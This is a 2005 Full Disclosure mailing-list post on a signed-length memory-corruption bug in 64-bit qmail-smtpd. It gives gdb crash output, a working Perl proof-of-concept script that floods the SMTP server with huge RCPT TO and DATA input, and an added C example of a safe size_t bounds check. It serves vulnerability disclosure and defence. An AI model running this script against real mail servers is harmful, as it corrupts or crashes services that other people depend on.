Full Disclosure mailing list archives

Re: 64 bit qmail fun
From: Georgi Guninski <guninski () guninski com>
Date: Mon, 9 May 2005 16:17:34 +0300

On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html

3. sign problem in qmail_put/substdio_put

on
FreeBSD amdkotef64.localdomain 5.3-BETA6 FreeBSD 5.3-BETA6 #0: Sat Sep 25 21:49:38 UTC 2004     root () fanboy samsco home:/usr/obj/usr/src/sys/GENERIC amd64

the static/heap layout is "better" than linux, so 
bytecopy(negative) passes and a lot of memory is corrupted:

0x400000 0x408000 8 0 0xffffff0047c857e0 r-x 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x507000 0x508000 1 0 0xffffff00471e0380 rw- 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x508000 0x50b000 3 0 0xffffff005b5d6c40 rw- 2 0 0x2180 NCOW NNC swap -
0x50b000 0x1778df000 338914 0 0xffffff005b5d6c40 rwx 2 0 0x2180 NCOW NNC swap
-
0x200507000 0x200529000 17 0 0xffffff005d2a6700 r-x 59 28 0x4 COW NC vnode
/libexec/ld-elf.so.1

note memory is contiguous.

Program received signal SIGBUS, Bus error.
0x000000020069afb6 in ldexp () from /lib/libc.so.5
(gdb) info stack
#0  0x000000020069afb6 in ldexp () from /lib/libc.so.5
#1  0x000000020069b07c in ldexp () from /lib/libc.so.5
#2  0x000000020069b2eb in ldexp () from /lib/libc.so.5
#3  0x000000020069bc6d in ldexp () from /lib/libc.so.5
#4  0x000000020069bd58 in malloc () from /lib/libc.so.5
#5  0x00000000004058aa in alloc (n=1040) at alloc.c:20
#6  0x000000000040592f in alloc_re (x=0x508e20, m=896, n=1039) at alloc_re.c:11
#7  0x0000000000405580 in stralloc_readyplus (x=0x508e20, n=897) at stralloc_eady.c:6
#8  0x00000000004023a8 in commands (ss=0x507640, c=0x507660) at commands.c:20
#9  0x00000000004020e1 in main () at qmail-smtpd.c:419


(gdb) x/i $rip
0x20069afb6 <ldexp+1654>:       movq   $0x2,(%rax,%rsi,8)
(gdb) p/x $rax
$7 = 0x200837000
(gdb) p/x $rsi
$8 = 0x7676767676268

0x50b360:       0x76767676      0x76767676      0x54007676      0x76767676

probably after substdio is corrupted even more fun is possible.


---------------------------------------------------------------
#!/usr/bin/perl -w

# copyright georgi guninski
# cannot be used in vulnerability databases

use IO::Socket;

my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;

my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host, 
        PeerPort=>$port) || die("socket");


my $payload="v" x (1024*1024);
my $lo2 = "v" x (1024*1024);

my $i=0;
my $t;

print $sock "HELO a\r\n";
print $sock "MAIL FROM: a\r\n";

my $leg = 842;

$payload = "v" x $leg;
$cou=0;
my $vp= "v" x (1024*1024);

my $wri = 0;

while (42)
{
print $sock "RCPT TO: ${payload}\r\n";
$t=<$sock>;
$cou++;
$wri += ($leg + 2);
if ($wri > 0x80000010) {last;}
if ($cou % (1024) == 0) {print " .. " . $wri/(1024*1024) . "\n";}
}



print $sock "DATA\r\n";
print $sock "where do you want bill gates to go today?\r\n";
print $sock ".\r\n";

while (42)
{
print $sock "${lo2}";
}

while(<$sock>)
{
        print $_;
}
---------------------------------------------------------------
-- 
where do you want bill gates to go today?
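As an added illustration of the sign problem described above (this is hypothetical code written for this archive page, not Georgi's PoC and not qmail's substdio), the following C shows why a length tracked as a signed int stops protecting a buffer once a 64-bit host has pushed the byte count past INT_MAX, beside a size_t version of the same check. The names as_int32, weak_check_accepts and safe_check_accepts are assumptions.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: the 32-bit 'int' view of a byte count that has grown
 * past INT_MAX on an amd64 host. Computed by hand so the result does not
 * depend on implementation-defined out-of-range conversion. */
static int as_int32(uint64_t count)
{
    uint64_t low = count & 0xffffffffULL;
    if (low < 0x80000000ULL)
        return (int)low;
    /* 0x100000000 - low is in (0, 2^31], so the negation fits an int. */
    return (int)-(int64_t)(0x100000000ULL - low);
}

/* Weak check in the style the post describes: 'len' is a signed int, so a
 * negative length satisfies 'len <= avail' and the copy would proceed. */
static int weak_check_accepts(int capacity, int used, int len)
{
    return len <= capacity - used;
}

/* Hardened check: all sizes are size_t, and the subtraction cannot wrap
 * because 'used > capacity' is rejected first. */
static int safe_check_accepts(size_t capacity, size_t used, size_t len)
{
    if (used > capacity)
        return 0;
    return len <= capacity - used;
}

int main(void)
{
    /* 0x80000010 is the byte total the PoC loop stops at; the int view of
     * that count is negative, so the weak check lets it through. */
    uint64_t total = 0x80000010ULL;
    int len = as_int32(total);

    printf("int view of %llu bytes: %d\n", (unsigned long long)total, len);
    printf("weak check accepts: %d\n", weak_check_accepts(1024, 0, len));
    printf("safe check accepts: %d\n", safe_check_accepts(1024, 0, total));
    return 0;
}
```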
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/